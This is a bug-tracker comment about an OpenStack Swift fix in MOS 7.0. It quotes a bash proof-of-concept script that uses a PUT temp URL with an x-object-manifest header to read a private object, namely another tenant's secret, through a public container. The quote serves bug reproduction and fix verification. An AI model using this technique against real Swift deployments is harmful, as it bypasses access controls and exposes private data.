Comment 6 for bug 1487450

Patch is presented on OpenStack environment, which was deployed by MOS 7.0 ISO #288 RC2.

I found the script which can reproduce the issue in https://bugs.launchpad.net/swift/+bug/1453948 comments:

    #!/bin/bash
    # resetswift
    set -e
    echo "password" > secret
    swift upload private secret
    swift post -H 'x-account-meta-temp-url-key: mykey'
    # create a container for people to upload stuff too
    swift post public
    # attacker: "yes hello, can I have a safe place to upload some of my data?"
    PUT_TEMPURL_SIG="$(swift tempurl PUT 60 /v1/AUTH_test/public/your-thing mykey)"
    curl -XPUT -H 'x-object-manifest: private/secret' "http://localhost:8080${PUT_TEMPURL_SIG}" -d ''
    # attacker: "oh yes, that data I just uploaded - can I download it please?"
    PUT_TEMPURL_SIG="$(swift tempurl GET 60 /v1/AUTH_test/public/your-thing mykey)"
    # attacker: only... it's not *MY* data - trolrolrololollolo
    echo ""
    echo "**************************************"
    curl "http://localhost:8080${PUT_TEMPURL_SIG}"
    echo ""
    echo "**************************************"

status changed to Fix Released for MOS 7.0.